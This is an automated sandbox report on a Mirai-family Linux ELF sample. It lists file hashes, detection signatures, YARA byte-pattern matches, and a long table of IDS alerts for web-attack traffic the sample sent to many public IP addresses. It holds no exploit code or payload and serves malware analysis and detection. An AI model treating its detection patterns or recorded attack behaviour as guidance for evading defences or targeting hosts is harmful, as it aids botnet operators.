Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
x86_64.elf

Overview

General Information

Sample name:x86_64.elf
Analysis ID:1567835
MD5:88660446811d50c52341472f9b03d870
SHA1:bc8c0a5be47d1538a1504aded3f9fdffaabe3b6f
SHA256:011c4d82c6f391669c979bb51cabe5815e14f370e96e4492d298ad16f510b73d
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1567835
Start date and time:2024-12-03 22:16:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 28s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:x86_64.elf
Detection:MAL
Classification:mal100.troj.linELF@0/0@25/0
  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: x86_64.elf
Command:/tmp/x86_64.elf
PID:6216
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
unstable_is_the_history_of_universe
Standard Error:
  • system is lnxubuntu20
  • x86_64.elf (PID: 6216, Parent: 6132, MD5: 88660446811d50c52341472f9b03d870) Arguments: /tmp/x86_64.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
x86_64.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
    x86_64.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      x86_64.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
      • 0xc664:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      x86_64.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
      • 0xce53:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
      x86_64.elfLinux_Trojan_Gafgyt_d4227dbfunknownunknown
      • 0xbb42:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      • 0xbc50:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      Click to see the 9 entries
      SourceRuleDescriptionAuthorStrings
      6216.1.0000000000400000.0000000000411000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        6216.1.0000000000400000.0000000000411000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6216.1.0000000000400000.0000000000411000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
          • 0xc664:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
          6216.1.0000000000400000.0000000000411000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
          • 0xce53:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
          6216.1.0000000000400000.0000000000411000.r-x.sdmpLinux_Trojan_Gafgyt_d4227dbfunknownunknown
          • 0xbb42:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
          • 0xbc50:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
          Click to see the 25 entries
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-03T22:16:51.481968+010020300921Web Application Attack192.168.2.2336100148.77.50.20680TCP
          2024-12-03T22:16:51.910119+010020300921Web Application Attack192.168.2.2350814189.63.67.24280TCP
          2024-12-03T22:16:51.953564+010020300921Web Application Attack192.168.2.2356390201.216.93.11880TCP
          2024-12-03T22:16:52.840666+010020300921Web Application Attack192.168.2.2338588143.95.246.7480TCP
          2024-12-03T22:16:54.435640+010020300921Web Application Attack192.168.2.234702458.233.196.22080TCP
          2024-12-03T22:17:05.674697+010020300921Web Application Attack192.168.2.2338202195.66.25.12580TCP
          2024-12-03T22:17:05.762128+010020300921Web Application Attack192.168.2.2357118103.68.228.3880TCP
          2024-12-03T22:17:10.452402+010020300921Web Application Attack192.168.2.234400293.134.211.18780TCP
          2024-12-03T22:17:10.461269+010020300921Web Application Attack192.168.2.233455444.97.239.5880TCP
          2024-12-03T22:17:10.469901+010020300921Web Application Attack192.168.2.2350084141.23.106.5880TCP
          2024-12-03T22:17:10.478714+010020300921Web Application Attack192.168.2.235480269.105.106.180TCP
          2024-12-03T22:17:10.498657+010020300921Web Application Attack192.168.2.23513325.50.172.10280TCP
          2024-12-03T22:17:10.514385+010020300921Web Application Attack192.168.2.2349430142.163.169.14880TCP
          2024-12-03T22:17:10.514443+010020300921Web Application Attack192.168.2.2335632217.15.168.2580TCP
          2024-12-03T22:17:10.523664+010020300921Web Application Attack192.168.2.235380446.29.80.18280TCP
          2024-12-03T22:17:10.545681+010020300921Web Application Attack192.168.2.2356994106.125.175.24680TCP
          2024-12-03T22:17:10.555075+010020300921Web Application Attack192.168.2.233657853.119.123.1380TCP
          2024-12-03T22:17:10.555321+010020300921Web Application Attack192.168.2.2341946108.128.143.2180TCP
          2024-12-03T22:17:10.561391+010020300921Web Application Attack192.168.2.2358412191.107.11.3680TCP
          2024-12-03T22:17:10.570463+010020300921Web Application Attack192.168.2.235790423.13.227.18080TCP
          2024-12-03T22:17:10.577047+010020300921Web Application Attack192.168.2.2358214159.56.174.21180TCP
          2024-12-03T22:17:10.586263+010020300921Web Application Attack192.168.2.2338168136.30.197.4280TCP
          2024-12-03T22:17:10.586348+010020300921Web Application Attack192.168.2.2358950213.10.8.15380TCP
          2024-12-03T22:17:10.586498+010020300921Web Application Attack192.168.2.234885276.65.219.24480TCP
          2024-12-03T22:17:11.243397+010020300921Web Application Attack192.168.2.2357206193.208.82.8780TCP
          2024-12-03T22:17:11.389832+010020300921Web Application Attack192.168.2.234619659.87.238.4380TCP
          2024-12-03T22:17:11.421161+010020300921Web Application Attack192.168.2.2354544137.84.118.5580TCP
          2024-12-03T22:17:11.421600+010020300921Web Application Attack192.168.2.2342718200.134.217.20080TCP
          2024-12-03T22:17:11.421775+010020300921Web Application Attack192.168.2.235434089.199.198.1180TCP
          2024-12-03T22:17:11.421936+010020300921Web Application Attack192.168.2.235948889.148.112.8280TCP
          2024-12-03T22:17:11.422058+010020300921Web Application Attack192.168.2.234269886.87.136.3080TCP
          2024-12-03T22:17:11.422251+010020300921Web Application Attack192.168.2.233374651.0.21.4280TCP
          2024-12-03T22:17:11.422352+010020300921Web Application Attack192.168.2.235574850.18.129.22480TCP
          2024-12-03T22:17:11.422427+010020300921Web Application Attack192.168.2.2351504120.125.222.8480TCP
          2024-12-03T22:17:11.422525+010020300921Web Application Attack192.168.2.2340354177.102.58.16080TCP
          2024-12-03T22:17:11.430072+010020300921Web Application Attack192.168.2.2342740126.110.141.4480TCP
          2024-12-03T22:17:11.430700+010020300921Web Application Attack192.168.2.235199244.100.34.19080TCP
          2024-12-03T22:17:11.430716+010020300921Web Application Attack192.168.2.233553444.223.88.22280TCP
          2024-12-03T22:17:11.436228+010020300921Web Application Attack192.168.2.2353878219.159.129.9180TCP
          2024-12-03T22:17:11.436283+010020300921Web Application Attack192.168.2.2350606106.119.111.4980TCP
          2024-12-03T22:17:11.436402+010020300921Web Application Attack192.168.2.234121872.185.180.18880TCP
          2024-12-03T22:17:11.445525+010020300921Web Application Attack192.168.2.2336024161.83.220.8580TCP
          2024-12-03T22:17:11.452029+010020300921Web Application Attack192.168.2.2351966115.64.13.9180TCP
          2024-12-03T22:17:11.461521+010020300921Web Application Attack192.168.2.2334050133.151.36.23780TCP
          2024-12-03T22:17:11.461751+010020300921Web Application Attack192.168.2.233551019.67.64.3780TCP
          2024-12-03T22:17:11.461824+010020300921Web Application Attack192.168.2.2350274122.157.177.13080TCP
          2024-12-03T22:17:11.462032+010020300921Web Application Attack192.168.2.2344588186.244.224.180TCP
          2024-12-03T22:17:11.470526+010020300921Web Application Attack192.168.2.2346164120.53.85.17480TCP
          2024-12-03T22:17:11.471996+010020300921Web Application Attack192.168.2.2339452150.32.225.13380TCP
          2024-12-03T22:17:11.472003+010020300921Web Application Attack192.168.2.2339680149.70.197.24580TCP
          2024-12-03T22:17:11.472015+010020300921Web Application Attack192.168.2.234238495.148.172.17080TCP
          2024-12-03T22:17:11.472034+010020300921Web Application Attack192.168.2.2337802205.37.220.22480TCP
          2024-12-03T22:17:11.472096+010020300921Web Application Attack192.168.2.2352012101.26.29.8480TCP
          2024-12-03T22:17:11.472097+010020300921Web Application Attack192.168.2.234060218.120.91.23780TCP
          2024-12-03T22:17:11.472107+010020300921Web Application Attack192.168.2.233778666.28.161.17080TCP
          2024-12-03T22:17:11.472128+010020300921Web Application Attack192.168.2.2337950159.180.151.11780TCP
          2024-12-03T22:17:11.472144+010020300921Web Application Attack192.168.2.235367813.77.179.19280TCP
          2024-12-03T22:17:11.472161+010020300921Web Application Attack192.168.2.234826870.167.174.22480TCP
          2024-12-03T22:17:11.477295+010020300921Web Application Attack192.168.2.2343316115.161.242.23180TCP
          2024-12-03T22:17:11.477614+010020300921Web Application Attack192.168.2.2335752112.106.103.20780TCP
          2024-12-03T22:17:11.478015+010020300921Web Application Attack192.168.2.2335558159.216.106.17380TCP
          2024-12-03T22:17:11.478217+010020300921Web Application Attack192.168.2.235588270.48.67.13280TCP
          2024-12-03T22:17:11.478430+010020300921Web Application Attack192.168.2.233712452.147.152.23180TCP
          2024-12-03T22:17:11.478558+010020300921Web Application Attack192.168.2.2337904208.170.5.22280TCP
          2024-12-03T22:17:11.478696+010020300921Web Application Attack192.168.2.2352248182.205.184.22080TCP
          2024-12-03T22:17:11.478846+010020300921Web Application Attack192.168.2.235283683.119.82.14680TCP
          2024-12-03T22:17:11.492957+010020300921Web Application Attack192.168.2.23598388.163.124.14380TCP
          2024-12-03T22:17:11.493248+010020300921Web Application Attack192.168.2.2349242156.47.9.15980TCP
          2024-12-03T22:17:11.493275+010020300921Web Application Attack192.168.2.233669683.228.148.6880TCP
          2024-12-03T22:17:11.493289+010020300921Web Application Attack192.168.2.234886649.132.127.25480TCP
          2024-12-03T22:17:11.493296+010020300921Web Application Attack192.168.2.2357510117.255.80.13180TCP
          2024-12-03T22:17:11.493312+010020300921Web Application Attack192.168.2.234170286.199.183.4080TCP
          2024-12-03T22:17:11.508192+010020300921Web Application Attack192.168.2.2350074178.167.225.2080TCP
          2024-12-03T22:17:11.508613+010020300921Web Application Attack192.168.2.2341426202.130.12.21280TCP
          2024-12-03T22:17:11.508814+010020300921Web Application Attack192.168.2.236092632.60.240.15580TCP
          2024-12-03T22:17:11.509043+010020300921Web Application Attack192.168.2.2333070116.198.57.1780TCP
          2024-12-03T22:17:11.509144+010020300921Web Application Attack192.168.2.2356374163.247.225.17380TCP
          2024-12-03T22:17:11.509250+010020300921Web Application Attack192.168.2.23455301.78.144.17880TCP
          2024-12-03T22:17:11.509310+010020300921Web Application Attack192.168.2.23440642.116.62.18180TCP
          2024-12-03T22:17:11.509447+010020300921Web Application Attack192.168.2.2345496161.115.163.8880TCP
          2024-12-03T22:17:11.523616+010020300921Web Application Attack192.168.2.2355606138.128.101.13580TCP
          2024-12-03T22:17:11.623968+010020300921Web Application Attack192.168.2.2345042155.207.215.1180TCP
          2024-12-03T22:17:11.640071+010020300921Web Application Attack192.168.2.2359800111.131.4.8780TCP
          2024-12-03T22:17:11.649606+010020300921Web Application Attack192.168.2.234992273.123.193.3980TCP
          2024-12-03T22:17:11.669635+010020300921Web Application Attack192.168.2.2357504186.44.230.5180TCP
          2024-12-03T22:17:11.686349+010020300921Web Application Attack192.168.2.2358206146.239.100.8480TCP
          2024-12-03T22:17:13.461643+010020300921Web Application Attack192.168.2.234483023.93.194.13380TCP
          2024-12-03T22:17:13.468402+010020300921Web Application Attack192.168.2.236017699.212.18.16680TCP
          2024-12-03T22:17:13.468430+010020300921Web Application Attack192.168.2.2356424145.20.17.1380TCP
          2024-12-03T22:17:13.477061+010020300921Web Application Attack192.168.2.23402768.43.2.15580TCP
          2024-12-03T22:17:13.477262+010020300921Web Application Attack192.168.2.2334760210.36.162.13680TCP
          2024-12-03T22:17:13.483741+010020300921Web Application Attack192.168.2.2333488125.111.75.10580TCP
          2024-12-03T22:17:13.493239+010020300921Web Application Attack192.168.2.2360086176.10.51.16280TCP
          2024-12-03T22:17:13.499892+010020300921Web Application Attack192.168.2.2344762201.157.7.21780TCP
          2024-12-03T22:17:13.500179+010020300921Web Application Attack192.168.2.234100697.55.138.4880TCP
          2024-12-03T22:17:13.509239+010020300921Web Application Attack192.168.2.233448264.69.46.20780TCP
          2024-12-03T22:17:13.509321+010020300921Web Application Attack192.168.2.233484873.104.148.9580TCP
          2024-12-03T22:17:13.509529+010020300921Web Application Attack192.168.2.234599493.104.201.6580TCP
          2024-12-03T22:17:13.514929+010020300921Web Application Attack192.168.2.2340132128.106.21.14180TCP
          2024-12-03T22:17:13.514997+010020300921Web Application Attack192.168.2.2354072194.18.61.9480TCP
          2024-12-03T22:17:13.523796+010020300921Web Application Attack192.168.2.2341618101.211.231.25180TCP
          2024-12-03T22:17:13.524305+010020300921Web Application Attack192.168.2.2349154107.229.45.19180TCP
          2024-12-03T22:17:13.524472+010020300921Web Application Attack192.168.2.23550862.233.134.11680TCP
          2024-12-03T22:17:13.524760+010020300921Web Application Attack192.168.2.23371761.252.247.6880TCP
          2024-12-03T22:17:13.540105+010020300921Web Application Attack192.168.2.2336864159.157.188.5280TCP
          2024-12-03T22:17:13.555986+010020300921Web Application Attack192.168.2.234811654.6.47.12480TCP
          2024-12-03T22:17:13.556042+010020300921Web Application Attack192.168.2.2355390103.104.235.12080TCP
          2024-12-03T22:17:13.556149+010020300921Web Application Attack192.168.2.2333352213.75.138.15580TCP
          2024-12-03T22:17:13.556242+010020300921Web Application Attack192.168.2.2351820110.23.29.22080TCP
          2024-12-03T22:17:13.670945+010020300921Web Application Attack192.168.2.2353464128.160.146.6280TCP
          2024-12-03T22:17:13.701998+010020300921Web Application Attack192.168.2.234482813.37.13.25180TCP
          2024-12-03T22:17:13.823865+010020300921Web Application Attack192.168.2.2341832192.18.96.17380TCP
          2024-12-03T22:17:13.823918+010020300921Web Application Attack192.168.2.234853857.247.150.10580TCP
          2024-12-03T22:17:13.823925+010020300921Web Application Attack192.168.2.235691446.96.134.25180TCP
          2024-12-03T22:17:13.824019+010020300921Web Application Attack192.168.2.235596276.165.243.280TCP
          2024-12-03T22:17:13.824036+010020300921Web Application Attack192.168.2.2355198138.190.218.6480TCP
          2024-12-03T22:17:13.824059+010020300921Web Application Attack192.168.2.2349884175.136.0.20680TCP
          2024-12-03T22:17:13.824072+010020300921Web Application Attack192.168.2.235126817.188.107.7680TCP
          2024-12-03T22:17:14.657703+010020300921Web Application Attack192.168.2.2339196124.243.135.2480TCP
          2024-12-03T22:17:14.764675+010020300921Web Application Attack192.168.2.2339612191.228.77.21080TCP
          2024-12-03T22:17:14.815283+010020300921Web Application Attack192.168.2.2342840189.147.217.22480TCP
          2024-12-03T22:17:14.815296+010020300921Web Application Attack192.168.2.2359226116.216.114.680TCP
          2024-12-03T22:17:14.842813+010020300921Web Application Attack192.168.2.2339456156.146.98.2480TCP
          2024-12-03T22:17:14.898656+010020300921Web Application Attack192.168.2.2338702180.60.94.13280TCP
          2024-12-03T22:17:14.898776+010020300921Web Application Attack192.168.2.2335332174.196.88.17380TCP
          2024-12-03T22:17:14.976855+010020300921Web Application Attack192.168.2.2340120131.59.130.9480TCP
          2024-12-03T22:17:15.914658+010020300921Web Application Attack192.168.2.234215260.178.102.14180TCP
          2024-12-03T22:17:16.014530+010020300921Web Application Attack192.168.2.235480089.137.176.14180TCP
          2024-12-03T22:17:16.015281+010020300921Web Application Attack192.168.2.2359578179.140.51.21780TCP
          2024-12-03T22:17:16.070804+010020300921Web Application Attack192.168.2.234299282.147.27.11380TCP
          2024-12-03T22:17:16.071063+010020300921Web Application Attack192.168.2.2359154208.52.232.3180TCP
          2024-12-03T22:17:16.087125+010020300921Web Application Attack192.168.2.2344398150.222.20.6580TCP
          2024-12-03T22:17:16.087207+010020300921Web Application Attack192.168.2.235802242.222.254.7080TCP
          2024-12-03T22:17:16.150101+010020300921Web Application Attack192.168.2.2346118197.98.23.1780TCP
          2024-12-03T22:17:16.265228+010020300921Web Application Attack192.168.2.23538102.126.27.22080TCP
          2024-12-03T22:17:16.280738+010020300921Web Application Attack192.168.2.2333390166.205.84.5280TCP
          2024-12-03T22:17:16.305173+010020300921Web Application Attack192.168.2.2353538100.53.164.4980TCP
          2024-12-03T22:17:16.336304+010020300921Web Application Attack192.168.2.235278219.2.6.11580TCP
          2024-12-03T22:17:16.351869+010020300921Web Application Attack192.168.2.2336912148.28.111.15780TCP
          2024-12-03T22:17:16.733571+010020300921Web Application Attack192.168.2.2347612210.159.47.4780TCP
          2024-12-03T22:17:16.748899+010020300921Web Application Attack192.168.2.2344106211.28.212.8180TCP
          2024-12-03T22:17:16.820733+010020300921Web Application Attack192.168.2.2344492178.212.220.2680TCP
          2024-12-03T22:17:17.045964+010020300921Web Application Attack192.168.2.234193666.167.139.23980TCP
          2024-12-03T22:17:17.061478+010020300921Web Application Attack192.168.2.2347198102.244.213.780TCP
          2024-12-03T22:17:17.092523+010020300921Web Application Attack192.168.2.2350584165.204.23.19280TCP
          2024-12-03T22:17:17.101887+010020300921Web Application Attack192.168.2.2356618119.163.95.20080TCP
          2024-12-03T22:17:17.102077+010020300921Web Application Attack192.168.2.234652063.186.73.22880TCP
          2024-12-03T22:17:17.876887+010020300921Web Application Attack192.168.2.233628682.117.212.1180TCP
          2024-12-03T22:17:17.905034+010020300921Web Application Attack192.168.2.2349166207.31.188.480TCP
          2024-12-03T22:17:17.936507+010020300921Web Application Attack192.168.2.2338642129.65.108.22080TCP
          2024-12-03T22:17:17.945749+010020300921Web Application Attack192.168.2.2336528173.92.73.2880TCP
          2024-12-03T22:17:17.967854+010020300921Web Application Attack192.168.2.235507620.46.92.8380TCP
          2024-12-03T22:17:18.061653+010020300921Web Application Attack192.168.2.2349278209.24.153.15780TCP
          2024-12-03T22:17:18.070964+010020300921Web Application Attack192.168.2.2359224155.1.144.080TCP
          2024-12-03T22:17:18.071017+010020300921Web Application Attack192.168.2.2348634206.130.193.3180TCP
          2024-12-03T22:17:18.327276+010020300921Web Application Attack192.168.2.2349590157.22.181.3680TCP
          2024-12-03T22:17:18.359862+010020300921Web Application Attack192.168.2.2342842196.188.148.7680TCP
          2024-12-03T22:17:19.061405+010020300921Web Application Attack192.168.2.2359332155.118.130.19380TCP
          2024-12-03T22:17:19.061488+010020300921Web Application Attack192.168.2.2338904189.182.4.6180TCP
          2024-12-03T22:17:19.061677+010020300921Web Application Attack192.168.2.2355200102.76.177.9980TCP
          2024-12-03T22:17:19.061895+010020300921Web Application Attack192.168.2.2348552129.148.53.12280TCP
          2024-12-03T22:17:19.077017+010020300921Web Application Attack192.168.2.2339834123.103.236.18480TCP
          2024-12-03T22:17:19.092855+010020300921Web Application Attack192.168.2.2351112154.142.82.980TCP
          2024-12-03T22:17:19.108780+010020300921Web Application Attack192.168.2.2356648209.127.151.12480TCP
          2024-12-03T22:17:19.149301+010020300921Web Application Attack192.168.2.2348718200.217.174.25480TCP
          2024-12-03T22:17:19.342921+010020300921Web Application Attack192.168.2.2360084129.211.245.2180TCP
          2024-12-03T22:17:19.343299+010020300921Web Application Attack192.168.2.2337358110.248.91.16680TCP
          2024-12-03T22:17:19.383330+010020300921Web Application Attack192.168.2.235650039.172.171.10280TCP
          2024-12-03T22:17:22.468712+010020300921Web Application Attack192.168.2.2341350218.240.211.5480TCP
          2024-12-03T22:17:22.492687+010020300921Web Application Attack192.168.2.236014637.167.205.5980TCP
          2024-12-03T22:17:22.515252+010020300921Web Application Attack192.168.2.2349350222.56.136.10380TCP
          2024-12-03T22:17:22.524892+010020300921Web Application Attack192.168.2.2335830131.251.233.1280TCP
          2024-12-03T22:17:22.595115+010020300921Web Application Attack192.168.2.233908240.206.44.1280TCP
          2024-12-03T22:17:22.618027+010020300921Web Application Attack192.168.2.234909485.167.75.10780TCP
          2024-12-03T22:17:24.389932+010020300921Web Application Attack192.168.2.235657846.179.166.16580TCP
          2024-12-03T22:17:25.499265+010020300921Web Application Attack192.168.2.233411227.23.244.9380TCP
          2024-12-03T22:17:25.555492+010020300921Web Application Attack192.168.2.2346992122.51.34.24580TCP
          2024-12-03T22:17:25.555501+010020300921Web Application Attack192.168.2.2345804141.101.229.1480TCP
          2024-12-03T22:17:25.655752+010020300921Web Application Attack192.168.2.2343326223.224.73.20380TCP
          2024-12-03T22:17:26.483400+010020300921Web Application Attack192.168.2.235330694.202.68.7080TCP
          2024-12-03T22:17:26.483476+010020300921Web Application Attack192.168.2.2360528102.178.231.280TCP
          2024-12-03T22:17:26.483679+010020300921Web Application Attack192.168.2.2342128180.221.255.12280TCP
          2024-12-03T22:17:26.483762+010020300921Web Application Attack192.168.2.235243884.166.254.5180TCP
          2024-12-03T22:17:26.515006+010020300921Web Application Attack192.168.2.234305657.252.136.11880TCP
          2024-12-03T22:17:26.515130+010020300921Web Application Attack192.168.2.2356840162.192.141.380TCP
          2024-12-03T22:17:26.515202+010020300921Web Application Attack192.168.2.234575438.228.60.1880TCP
          2024-12-03T22:17:26.515379+010020300921Web Application Attack192.168.2.233437647.105.199.18780TCP
          2024-12-03T22:17:26.515446+010020300921Web Application Attack192.168.2.234971848.204.138.16080TCP
          2024-12-03T22:17:26.515699+010020300921Web Application Attack192.168.2.2339310112.96.150.12580TCP
          2024-12-03T22:17:26.515763+010020300921Web Application Attack192.168.2.235701824.190.180.19580TCP
          2024-12-03T22:17:26.515913+010020300921Web Application Attack192.168.2.233925859.152.138.20780TCP
          2024-12-03T22:17:26.516040+010020300921Web Application Attack192.168.2.2341280178.2.115.5580TCP
          2024-12-03T22:17:26.524305+010020300921Web Application Attack192.168.2.2334228135.251.244.24980TCP
          2024-12-03T22:17:26.524390+010020300921Web Application Attack192.168.2.2357768167.22.27.20080TCP
          2024-12-03T22:17:26.524512+010020300921Web Application Attack192.168.2.2352820129.149.237.780TCP
          2024-12-03T22:17:26.524601+010020300921Web Application Attack192.168.2.2339402116.202.231.24580TCP
          2024-12-03T22:17:26.524764+010020300921Web Application Attack192.168.2.2346824205.252.97.20680TCP
          2024-12-03T22:17:26.525069+010020300921Web Application Attack192.168.2.235780881.57.120.15580TCP
          2024-12-03T22:17:26.525087+010020300921Web Application Attack192.168.2.2350334152.208.229.12180TCP
          2024-12-03T22:17:26.530425+010020300921Web Application Attack192.168.2.2355708176.120.199.5680TCP
          2024-12-03T22:17:26.539411+010020300921Web Application Attack192.168.2.234796093.194.123.7680TCP
          2024-12-03T22:17:26.539627+010020300921Web Application Attack192.168.2.23483309.161.88.22980TCP
          2024-12-03T22:17:26.546051+010020300921Web Application Attack192.168.2.233473288.39.75.12780TCP
          2024-12-03T22:17:26.546122+010020300921Web Application Attack192.168.2.234907427.241.250.9780TCP
          2024-12-03T22:17:26.555231+010020300921Web Application Attack192.168.2.2346752188.44.76.8280TCP
          2024-12-03T22:17:26.555339+010020300921Web Application Attack192.168.2.2354972179.29.60.11680TCP
          2024-12-03T22:17:26.555603+010020300921Web Application Attack192.168.2.2343326136.1.157.4580TCP
          2024-12-03T22:17:26.555736+010020300921Web Application Attack192.168.2.2349126115.174.254.980TCP
          2024-12-03T22:17:26.555908+010020300921Web Application Attack192.168.2.2350414205.7.167.3380TCP
          2024-12-03T22:17:26.556188+010020300921Web Application Attack192.168.2.234292496.211.14.13680TCP
          2024-12-03T22:17:26.561647+010020300921Web Application Attack192.168.2.2355370222.149.156.5980TCP
          2024-12-03T22:17:26.562032+010020300921Web Application Attack192.168.2.234004452.243.132.9080TCP
          2024-12-03T22:17:26.570798+010020300921Web Application Attack192.168.2.2344772167.48.89.1180TCP
          2024-12-03T22:17:26.571191+010020300921Web Application Attack192.168.2.235112473.34.85.14880TCP
          2024-12-03T22:17:26.586504+010020300921Web Application Attack192.168.2.23383362.132.182.10480TCP
          2024-12-03T22:17:26.586538+010020300921Web Application Attack192.168.2.2343984184.133.164.17280TCP
          2024-12-03T22:17:26.602131+010020300921Web Application Attack192.168.2.2334674119.62.113.14880TCP
          2024-12-03T22:17:26.749406+010020300921Web Application Attack192.168.2.2336326104.129.192.3080TCP
          2024-12-03T22:17:26.749518+010020300921Web Application Attack192.168.2.23603341.48.153.3180TCP
          2024-12-03T22:17:26.764892+010020300921Web Application Attack192.168.2.2342330193.81.123.15580TCP
          2024-12-03T22:17:26.765066+010020300921Web Application Attack192.168.2.2347286132.121.27.12680TCP
          2024-12-03T22:17:26.765428+010020300921Web Application Attack192.168.2.234225240.201.96.6980TCP
          2024-12-03T22:17:26.765614+010020300921Web Application Attack192.168.2.2344292147.169.251.380TCP
          2024-12-03T22:17:26.774039+010020300921Web Application Attack192.168.2.234852485.166.29.8880TCP
          2024-12-03T22:17:26.796259+010020300921Web Application Attack192.168.2.2351890152.18.186.5280TCP
          2024-12-03T22:17:26.814309+010020300921Web Application Attack192.168.2.2333484180.33.117.14180TCP
          2024-12-03T22:17:26.821008+010020300921Web Application Attack192.168.2.234295831.153.242.17780TCP
          2024-12-03T22:17:27.546201+010020300921Web Application Attack192.168.2.2360112208.160.36.11080TCP
          2024-12-03T22:17:27.603258+010020300921Web Application Attack192.168.2.235318423.65.54.7880TCP
          2024-12-03T22:17:27.868161+010020300921Web Application Attack192.168.2.2347950128.53.112.20380TCP
          2024-12-03T22:17:27.868168+010020300921Web Application Attack192.168.2.234616050.40.222.21880TCP
          2024-12-03T22:17:27.868187+010020300921Web Application Attack192.168.2.2341558159.129.33.5780TCP
          2024-12-03T22:17:27.868189+010020300921Web Application Attack192.168.2.235221474.140.209.20180TCP
          2024-12-03T22:17:27.868193+010020300921Web Application Attack192.168.2.2345414119.7.68.10880TCP
          2024-12-03T22:17:27.868193+010020300921Web Application Attack192.168.2.2355606130.99.153.14580TCP
          2024-12-03T22:17:27.868195+010020300921Web Application Attack192.168.2.2338814213.127.9.24480TCP
          2024-12-03T22:17:27.868232+010020300921Web Application Attack192.168.2.23579724.20.92.22380TCP
          2024-12-03T22:17:27.868233+010020300921Web Application Attack192.168.2.234759076.92.78.11280TCP
          2024-12-03T22:17:27.868346+010020300921Web Application Attack192.168.2.2357376140.209.104.12980TCP
          2024-12-03T22:17:27.868346+010020300921Web Application Attack192.168.2.235686053.16.184.8180TCP
          2024-12-03T22:17:27.868348+010020300921Web Application Attack192.168.2.233624095.242.147.17780TCP
          2024-12-03T22:17:27.868404+010020300921Web Application Attack192.168.2.2343478122.93.228.24880TCP
          2024-12-03T22:17:27.868480+010020300921Web Application Attack192.168.2.2349214219.175.97.7180TCP
          2024-12-03T22:17:27.884681+010020300921Web Application Attack192.168.2.234726899.147.210.3880TCP
          2024-12-03T22:17:27.915236+010020300921Web Application Attack192.168.2.2359144166.63.105.9880TCP
          2024-12-03T22:17:28.514799+010020300921Web Application Attack192.168.2.2333834151.51.89.7280TCP
          2024-12-03T22:17:28.524144+010020300921Web Application Attack192.168.2.235854283.86.34.1080TCP
          2024-12-03T22:17:28.530399+010020300921Web Application Attack192.168.2.235980046.71.5.5680TCP
          2024-12-03T22:17:28.530641+010020300921Web Application Attack192.168.2.234358488.81.6.18580TCP
          2024-12-03T22:17:28.530873+010020300921Web Application Attack192.168.2.2352350211.150.95.16280TCP
          2024-12-03T22:17:28.545985+010020300921Web Application Attack192.168.2.2355088197.148.94.12780TCP
          2024-12-03T22:17:28.546181+010020300921Web Application Attack192.168.2.2355098193.157.209.11680TCP
          2024-12-03T22:17:28.561632+010020300921Web Application Attack192.168.2.2339322216.253.100.1880TCP
          2024-12-03T22:17:28.561975+010020300921Web Application Attack192.168.2.235468027.102.158.5280TCP
          2024-12-03T22:17:28.561993+010020300921Web Application Attack192.168.2.2336022104.35.149.16280TCP
          2024-12-03T22:17:28.562017+010020300921Web Application Attack192.168.2.23514401.52.172.13580TCP
          2024-12-03T22:17:28.586439+010020300921Web Application Attack192.168.2.2342808170.77.116.12780TCP
          2024-12-03T22:17:28.586527+010020300921Web Application Attack192.168.2.2335946130.49.81.23880TCP
          2024-12-03T22:17:28.592866+010020300921Web Application Attack192.168.2.234054265.194.145.24080TCP
          2024-12-03T22:17:28.593006+010020300921Web Application Attack192.168.2.2340340213.151.138.12780TCP
          2024-12-03T22:17:28.593280+010020300921Web Application Attack192.168.2.2342166189.137.32.2680TCP
